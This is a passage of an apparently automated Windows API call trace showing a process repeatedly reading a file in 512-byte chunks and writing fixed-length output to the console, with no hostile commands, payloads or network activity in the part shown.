(hFile=0x50) returned 0x1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] GetFileType (hFile=0x50) returned 0x1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.967] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.967] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] GetFileType (hFile=0x50) returned 0x1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] GetFileType (hFile=0x50) returned 0x1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] GetFileType (hFile=0x50) returned 0x1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] GetFileType (hFile=0x50) returned 0x1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] GetFileType (hFile=0x50) returned 0x1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.968] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.968] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.968] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.968] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] GetFileType (hFile=0x50) returned 0x1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] GetFileType (hFile=0x50) returned 0x1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.968] GetFileType (hFile=0x50) returned 0x1 [0202.968] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] GetFileType (hFile=0x50) returned 0x1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] GetFileType (hFile=0x50) returned 0x1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] GetFileType (hFile=0x50) returned 0x1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] GetFileType (hFile=0x50) returned 0x1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] GetFileType (hFile=0x50) returned 0x1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.969] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.969] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.969] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.969] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] GetFileType (hFile=0x50) returned 0x1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] GetFileType (hFile=0x50) returned 0x1 [0202.969] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.969] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] GetFileType (hFile=0x50) returned 0x1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] GetFileType (hFile=0x50) returned 0x1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] GetFileType (hFile=0x50) returned 0x1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] GetFileType (hFile=0x50) returned 0x1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] GetFileType (hFile=0x50) returned 0x1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] GetFileType (hFile=0x50) returned 0x1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.970] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.970] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.970] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.970] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.970] GetFileType (hFile=0x50) returned 0x1 [0202.970] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] GetFileType (hFile=0x50) returned 0x1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] GetFileType (hFile=0x50) returned 0x1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] GetFileType (hFile=0x50) returned 0x1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] GetFileType (hFile=0x50) returned 0x1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] GetFileType (hFile=0x50) returned 0x1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] GetFileType (hFile=0x50) returned 0x1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] GetFileType (hFile=0x50) returned 0x1 [0202.971] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.971] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.971] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.971] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.971] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.971] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] GetFileType (hFile=0x50) returned 0x1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] GetFileType (hFile=0x50) returned 0x1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] GetFileType (hFile=0x50) returned 0x1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] GetFileType (hFile=0x50) returned 0x1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] GetFileType (hFile=0x50) returned 0x1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] GetFileType (hFile=0x50) returned 0x1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] GetFileType (hFile=0x50) returned 0x1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] GetFileType (hFile=0x50) returned 0x1 [0202.972] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.972] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.972] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.973] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.973] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.973] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] GetFileType (hFile=0x50) returned 0x1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] GetFileType (hFile=0x50) returned 0x1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] WriteFile (in: hFile=0x50, lpBuffer=0x12efac*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] GetFileType (hFile=0x50) returned 0x1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] WriteFile (in: hFile=0x50, lpBuffer=0x12effc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12effc*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] GetFileType (hFile=0x50) returned 0x1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] WriteFile (in: hFile=0x50, lpBuffer=0x12f04c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f04c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] GetFileType (hFile=0x50) returned 0x1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] WriteFile (in: hFile=0x50, lpBuffer=0x12f09c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f09c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] GetFileType (hFile=0x50) returned 0x1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] WriteFile (in: hFile=0x50, lpBuffer=0x12f0ec*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f0ec*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] GetFileType (hFile=0x50) returned 0x1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] WriteFile (in: hFile=0x50, lpBuffer=0x12f13c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f13c*, lpNumberOfBytesWritten=0x12e190*=0x50, lpOverlapped=0x0) returned 1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.973] GetFileType (hFile=0x50) returned 0x1 [0202.973] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.974] WriteFile (in: hFile=0x50, lpBuffer=0x12f18c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x12e190, lpOverlapped=0x0 | out: lpBuffer=0x12f18c*, lpNumberOfBytesWritten=0x12e190*=0x20, lpOverlapped=0x0) returned 1 [0202.974] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.974] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x12e17c | out: lpNewFilePointer=0x0) returned 1 [0202.974] _get_osfhandle (_FileHandle=4) returned 0x58 [0202.974] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.974] _get_osfhandle (_FileHandle=1) returned 0x50 [0202.974] GetFileType (hFile=0x50) returned 0x1 [0202.974] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.974] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.974] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.974] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.974] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.974] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.974] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.974] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.975] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.975] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.975] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.975] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.975] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.975] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.975] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.975] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.975] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.975] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: hFile=0x58, lpBuffer=0x12efac, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x12e19c, lpOverlapped=0x0 | out: lpBuffer=0x12efac*, lpNumberOfBytesRead=0x12e19c*=0x200, lpOverlapped=0x0) returned 1 [0202.976] ReadFile (in: 